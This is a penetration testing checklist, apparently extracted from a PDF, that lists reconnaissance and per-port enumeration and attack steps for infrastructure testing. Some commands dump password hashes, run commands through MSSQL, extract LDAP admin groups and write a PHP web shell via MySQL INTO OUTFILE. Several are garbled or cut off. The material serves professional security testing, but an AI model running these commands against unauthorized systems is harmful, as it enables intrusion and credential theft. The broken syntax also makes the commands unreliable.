Infrastructure Penetration Testing Checklist

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The document discusses a checklist of steps for infrastructure penetration testing including external and internal reconnaissance, vulnerability assessment, and various protocol enumerations and attacks.

Common ports scanned include SSH (22), SMTP (25), DNS (53), HTTP/HTTPS (80/443), SMB (445), LDAP (389), MSSQL (1433), MySQL (3306) among others.

The document mentions bruteforcing usernames using nmap and various LDAP queries to extract user, computer and group information from Active Directory.

Infrastructure Penetration Testing Checklist

A Full Checklist for Infrastructure Penetration Testing

Prepared by: Purab Parihar

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External Infrastructure

Performing Subdomain Scans

Performing recon on Company's LinkedIn Page

Listing Employees from Company Profile

Extracting email addresss from Employees's Profile for Identifying email formats

Google Dorking on Email's Found / Guessed Patterns

Gathering Breached Credentials

Performing Port Scan on IPs

Using Shodan on Public Facing IPs

Internal Infrastructure

Using Responder in Analyze Mode

Using Wireshark for monitoring Network Traffic

Performing Netowrk Range Scan


Performing WhoIs on IPs

Performing ASN Discovery

Gathering DNS Records

Bruteforce Hostnames with DNS

Google Dorking

Site: Domain]

Infrastructure Penetration Testing Checklist 1

filetype:"xls | xlsx | doc | docx | ppt | pptx | pdf" site:[Domain] "FOUO" | "NOFORN" | "Confidential"

filetype:xml inurl:sitemap

and many more

Reverse DNS Lookup

Mapping Network

Identitfying Live Hosts

Port Scan

Service Scan

Version Scan

Scanning with NSE/Scripts

OS Scan

UDP as well as TCP Scan

SNMP Enumeration



NetBIOS Enumeration



Visualizing Network on MindMaps

Vulnerability Assessment and PT

FTP Port 21

Grabbing Banner for Versions

Anonymous Login

FTP Bounce

Default or Guessable Passwords

SSH Port 22)

Grabbing Banner for Versions

Null Password

Default or Guessable Passwords

SMTP Port 25

Grabbing Banner for Versions

Connect with Telnet

SMTP Relay

User Enumeration

DNS Port 53

DNS Hostname Bruteforce

DNS Reverse Lookup

DNS Service Record Enumeration

DNS Service Discovery

DNS Zone Transfer


Pages accessible without authentication like


Infrastructure Penetration Testing Checklist 2



Vulnerable Versions Exploitation


Enumerating .config files

Trace.AXD enabled debugging

Path Traversal

Source Code Disclosure

Downloading DLLs






Microsoft IIS tilde character “~” Vulnerability

Basic Authentication bypass IIS 7.5 by trying to access



Grabbing Banner for Version

Directory BruteForce

Kerberos Port 88

Active Directory Attacks We're not going to cover this here)

Bruteforcing Usernames with nmap


RPC Port 111

Enumerating Basic Information using rpcinfo

Connect to RPC with RPC Client

Rusersd Port 1026

Enumerating users with rusers

NFS 2049

Checking for Accessible mounts

showmount -e IP


mount -t nfs [-o vers=2 <ip>:<remote_folder> <local_folder> -o nolock

LDAP Port 389

Listing public information

nmap -n -sV --script "ldap* and not brute" IP

Checking Null Credentials

ldapsearch -x -h IP D '' -w '' -b "DC1_SUBDOMAIN,DCTDL"

Extracting Users

ldapsearch -x -h IP D 'DOMAIN\<username>' -w '<password>' -b "CNUsers,DC


Infrastructure Penetration Testing Checklist 3

Extracting Computers

ldapsearch -x -h IP D 'DOMAIN\<username>' -w '<password>' -b "CNComputers,DC


Extracting my info

ldapsearch -x -h IP D 'DOMAIN\<username>' -w '<password>' -b "CNMY


Extracting Domain Admins

ldapsearch -x -h IP D 'DOMAIN\<username>' -w '<password>' -b "CNDomain


Extracting Enterprise Admins

ldapsearch -x -h IP D 'DOMAIN\<username>' -w '<password>' -b "CNEnterprise


Extracting Administrators:

ldapsearch -x -h IP D 'DOMAIN\<username>' -w '<password>' -b


Extracting Remote Desktop Groups

ldapsearch -x -h IP D 'DOMAIN\<username>' -w '<password>' -b "CNRemote Desktop


For graphical Interface, jxplorer can be used

SMB Port 445

Anonymous Credentials

Grabbing Banner for Versions

Null Sessions

Exploitation with RPCClient

List user :enumdomusers

Get user details: queryuser 0xrid>

Get user groups: queryusergroups 0xrid>

GET SID of a user: lookupnames <username>

Get users aliases: queryuseraliases [builtin|domain] <sid>

List groups: enumdomgroups

Get group details: querygroup 0xrid>

Get group members: querygroupmem 0xrid>

List alias: enumalsgroups <builtin|domain>

Get members: queryaliasmem builtin|domain 0xrid>

List domains: enumdomains

Get SID lsaquery

Domain info: querydominfo

Find SIDs by name: lookupnames <username>

Find more SIDs: lsaenumsid

RID cycling (check more SIDs): lookupsids <sid>

Listing Shares

Null Session

smbclient --no-pass L //IP

Listinng Shares with Credentials

Infrastructure Penetration Testing Checklist 4

smbclient U 'username[%passwd]' L [--pw-nt-hash] //IP

Mount share

Without Credential

mount -t cifs //x.x.x.x/share /mnt/share

With Credential

mount -t cifs -o "username=user,password=password" //x.x.x.x/share /mnt/share

SMB Relay attack

MSSRPC Port 135

Endpoint Mapper Service Discovery

Hidden DCERPC Server Discovery

Remote Management Interface Discovery

DCERPC TCP Service Auditor

RTSP Port 554 & 8554

Gathering RTSP Methods

RTSP Url Bruteforce

Camerader can be used to access RTSP

MSSQL Port 1433

Banner Grabbing

Basic Information Gathering

nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-

ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args
name=MSSQLSERVER -sV -p 1433 IP

Execute Commands with MSSQL


crackmapexec mssql -d Domain name> -u <username> -p <password> -x "id"


If xp_cmdshell is enabled, we can execute commands without authentication

MSSQL Privilege Escalation



MySQL Port 3306

Enumerating with nmap

nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-

2122 IP

Banner Grabbing

Basic Commands

Enumerating Privileges

select grantee, table_schema, privilege_type FROM schema_privileges;

Enumerating File Privileges

select user,file_priv from mysql.user where user='root';

Enumerating Current User

select user();

Infrastructure Penetration Testing Checklist 5

Writing File

select 1,2,"?php echo shell_exec($_GET'c']);?",4 into OUTFILE 'C/xampp/htdocs/shell.php';

Reading file

select load_file('/home/purabparihar/read_file.txt');

User password change

UPDATE mysql.user SET authentication_string=PASSWORD'MyNewPass') WHERE User='root';

UPDATE mysql.user SET Password=PASSWORD'MyNewPass') WHERE User='root';

Extracting credentials

mysql -u root --password=<PASSWORD -e "SELECT User,Host,authentication_string FROM


Postgresql Port 5432

Banner Grabbing

DB Name Flag Injection

VNC Port 5900

UnAuth VNC Access

VNC Password

Password Location Password will be encrypted)


Decrypting Password

vncpwd.exe [encrypted password]

Redis Port 6379

Banner Grabbing

Try accessing redis without credentials

Enumeration after login

Extracting information

Extracting Connected Clients

client list

Extracting configuration


Dumping Database

SELECT [database with keys]



PJL Port 9100

PRET can be used for interacting with PJLNDS/PRET

Memcache Port 11211

Extracting Stats

memcstat --servers=

Extracting Memcdump

memccat --servers= <item1 <item2 <item3

Infrastructure Penetration Testing Checklist 6

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